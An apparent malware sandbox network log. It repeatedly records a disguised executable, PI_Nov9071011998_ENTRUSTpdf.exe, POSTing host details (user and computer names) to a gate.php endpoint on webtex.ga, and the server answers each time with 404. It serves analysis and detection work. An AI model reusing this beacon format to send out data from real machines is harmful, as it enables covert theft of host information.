                                    Dec 3, 2020 10:04:22.174315929 CET4922OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:22.190910101 CET4922OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:22.233496904 CET4922INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:39 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    29192.168.2.34974347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:41.097711086 CET143OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:41.114415884 CET144OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:41.155303001 CET144INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    290192.168.2.35003547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:22.442214012 CET4923OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:22.458952904 CET4923OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:22.546780109 CET4924INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:39 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    291192.168.2.35003647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:22.769361973 CET4924OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:22.786127090 CET4925OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:22.829092979 CET4925INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    292192.168.2.35003747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:23.028922081 CET4926OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:23.045603037 CET4926OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:23.092648029 CET4926INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    293192.168.2.35003847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:23.302681923 CET4927OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:23.319318056 CET4927OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:23.366543055 CET4928INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    294192.168.2.35003947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:23.590394974 CET4929OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:23.607166052 CET4929OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:23.648849010 CET4929INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    295192.168.2.35004047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:23.869442940 CET4930OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:23.886085033 CET4930OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:23.928852081 CET4931INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:41 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    296192.168.2.35004147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:24.157418013 CET4931OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:24.174293041 CET4932OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:24.216682911 CET4932INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:41 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    297192.168.2.35004247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:24.445219040 CET4933OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:24.462002993 CET4933OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:24.503657103 CET4933INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:41 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    298192.168.2.35004347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:24.740638018 CET4934OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:24.757440090 CET4934OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:24.798671961 CET4935INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:42 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    299192.168.2.35004447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:25.359903097 CET4935OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:25.376658916 CET4936OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:25.418654919 CET4936INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:42 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.34971247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:30.152512074 CET68OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:30.171303988 CET69OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:30.214601994 CET69INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:47 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    30192.168.2.34974447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:41.418473959 CET147OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:41.435306072 CET147OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:41.476969004 CET148INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    300192.168.2.35004547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:25.779330015 CET4937OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:25.795938969 CET4937OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:25.837142944 CET4937INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:43 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    31192.168.2.34974747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:41.727267027 CET158OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:41.743932009 CET158OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:41.777842045 CET163INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    32192.168.2.34974847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.032912016 CET166OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:42.049576998 CET167OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:42.092412949 CET171INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    33192.168.2.34974947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.331414938 CET171OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:42.348020077 CET172OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:42.389555931 CET172INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    34192.168.2.34975047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.653877020 CET173OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:42.670490026 CET173OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:42.717298985 CET173INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    35192.168.2.34975147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.984813929 CET174OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.008405924 CET174OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
